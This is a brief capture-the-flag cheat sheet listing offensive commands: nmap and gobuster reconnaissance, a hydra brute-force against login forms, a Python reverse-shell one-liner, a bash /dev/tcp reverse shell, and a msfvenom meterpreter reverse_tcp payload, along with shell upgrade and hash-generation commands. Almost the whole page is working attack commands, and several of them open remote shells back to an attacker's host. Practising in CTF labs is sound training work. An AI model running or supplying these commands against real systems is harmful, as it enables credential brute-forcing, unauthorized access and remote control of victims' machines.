CTF Cheat Sheet

This isn't meant to be a pretty page; it is purely a list of commands to help with CTFs.

Nmap Initial

nmap -sC -Pn -sV -p- -oN ./nmap/initial <TARGET_IP>

GoBuster

gobuster dir -u <TARGET_IP> -w /usr/share/wordlists/dirbuster/ -x html,php,txt

#NOTE: -x limits the search to these three extensions; amend it as needed

HYDRA – HTTP-POST

hydra -l <USER> -p <PASSWORD> <IP_ADDRESS> http-post-form "<LOGIN_PAGE>:<REQUEST_BODY>:<ERROR_MESSAGE>"
#NOTE: lowercase -l and -p take a single specific username or password; uppercase -L and -P take the path to a dictionary file

Shell Upgrade

export TERM=xterm
python -c 'import pty; pty.spawn("/bin/bash")'
# Or
python3 -c 'import pty; pty.spawn("/bin/bash")'

Python Server

python3 -m http.server
# Or, for Python 2 (SimpleHTTPServer became http.server in Python 3)
python -m SimpleHTTPServer

Reverse Shell – Web Interface

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MY_IP",9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

MSFVenom Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP_Address> LPORT=<your port> -f exe > safeshell1.exe

Add to Hosts with SUDO

echo "<IP> <ALIAS>" | sudo tee -a /etc/hosts

Bash Reverse Shell

bash -i >& /dev/tcp/<YOUR_IP>/9006 0>&1

SWAKS

swaks --to <TO_EMAIL> --from <FROM_EMAIL> --header "<SUBJECT>" --body "<MESSAGE_BODY>" --attach <ATTACHMENT> --server <IP>

Generate Shadow Passwords

perl -e "print crypt('<password>','\$6\$SALTsalt\$')"